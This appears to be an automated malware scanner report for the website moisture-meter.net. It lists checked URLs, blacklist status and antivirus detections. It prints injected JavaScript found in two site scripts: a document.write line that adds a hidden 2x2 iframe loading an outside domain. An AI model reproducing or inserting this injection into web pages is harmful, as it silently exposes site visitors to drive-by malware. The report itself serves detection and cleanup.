New scan:

Malware Scanner report for moisture-meter.net

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "moisture-meter.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/2/3
1 malicious and 2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=moisture-meter.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://moisture-meter.net/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://moisture-meter.net/
200 OK
Content-Length: 13262
Content-Type: text/html
clean
http://moisture-meter.net/facefiles/jquery-1.2.2.pack.js
200 OK
Content-Length: 29318
Content-Type: text/javascript
clean
http://moisture-meter.net/facefiles/facebox.js
200 OK
Content-Length: 6263
Content-Type: text/javascript
clean
http://moisture-meter.net/js.js
404 Not Found
Content-Length: 18960
Content-Type: text/html
malicious
Malicious iFrame found.
size: 200x33     
src: http://www.moisture-meter.net/sc1.php
This URL is marked by Yandex as suspicious

<iframe src="http://www.moisture-meter.net/sc1.php" frameborder="0" width="200" height="33">

http://www.moisture-meter.net/js.js
404 Not Found
Content-Length: 18960
Content-Type: text/html
clean
http://www.moisture-meter.net/js113.js
200 OK
Content-Length: 302395
Content-Type: text/javascript
clean
http://www.moisture-meter.net/anylinkcssmenu.js
404 Not Found
Content-Length: 18960
Content-Type: text/html
clean
http://www.moisture-meter.net/tree_frog_slide/stuHover.js
200 OK
Content-Length: 1067
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1219206></iframe>');

stuHover = function() {
var cssRule;
var newSelector;
for (var i=0; i< document.styleSheets.length; i++)
for (var x=0; x< document.styleSheets[i].rules.length; x++)
{
cssRule = document.styleSheets[i].rules[x];
if (cssRule.selectorText.indexOf("LI:hover") >= 0)
... 96 bytes are skipped ...
document.styleSheets[i].addRule(newSelector , cssRule.style.cssText);
}
}
var getElm = document.getElementById("nav").getElementsByTagName("LI");
for (var i=0; i<getElm.length; i++) {
getElm[i].onmouseover=function() {
this.className+=" iehover";
}
getElm[i].onmouseout=function() {
this.className=this.className.replace(new RegExp(" iehover\\b"), "");
}
}
}
if (window.attachEvent) window.attachEvent("onload", stuHover);

Antivirus reports:

Avast
JS:Iframe-AMJ [Trj]
Norman
Iframe.UW
GData
JS:Iframe-AMJ

Hidden iFrame found.
size: 2x2     
src: http://baloncestocuellar.com/whci.html?j=1219206

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1219206>

http://www.moisture-meter.net/facefiles/jquery-1.2.2.pack.js
200 OK
Content-Length: 29318
Content-Type: text/javascript
clean
http://www.moisture-meter.net/facefiles/facebox.js
200 OK
Content-Length: 6263
Content-Type: text/javascript
clean
https://apis.google.com/js/plusone.js
200 OK
Content-Length: 12777
Content-Type: application/javascript
clean
http://www.moisture-meter.net/js14.js
404 Not Found
Content-Length: 18960
Content-Type: text/html
clean
http://www.moisture-meter.net/js15.js
404 Not Found
Content-Length: 18960
Content-Type: text/html
clean
http://www.moisture-meter.net/exporter/Grain-Moisture-Meter.html
200 OK
Content-Length: 25553
Content-Type: text/html
clean
http://www.moisture-meter.net/js/jquery-1.6.2.min.js
200 OK
Content-Length: 91722
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1219206></iframe>');

(function(a,b){function cv(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cs(a){if(!cg[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch)
... 3206 bytes are skipped ...
b){var c=f(this);c[d](a.call(this,b,c[d]()))});if(f.isWindow(e)){var g=e.document.documentElement["client"+c];return e.document.compatMode==="CSS1Compat"&&g||e.document.body["client"+c]||g}if(e.nodeType===9)return Math.max(e.documentElement["client"+c],e.body["scroll"+c],e.documentElement["scroll"+c],e.body["offset"+c],e.documentElement["offset"+c]);if(a===b){var h=f.css(e,d),i=parseFloat(h);return f.isNaN(i)?h:i}return this.css(d,typeof a=="string"?a:a+"px")}}),a.jQuery=a.$=f})(window);

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-AMQ [Trj]
nProtect
Trojan.Iframe.BZW
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

Hidden iFrame found.
size: 2x2     
src: http://baloncestocuellar.com/whci.html?j=1219206

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1219206>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: moisture-meter.net

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 07:28:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: moisture-meter.net
Referer: http://www.google.com/search?q=moisture-meter.net

Result:
The result is similar to the first query. There are no suspicious redirects found.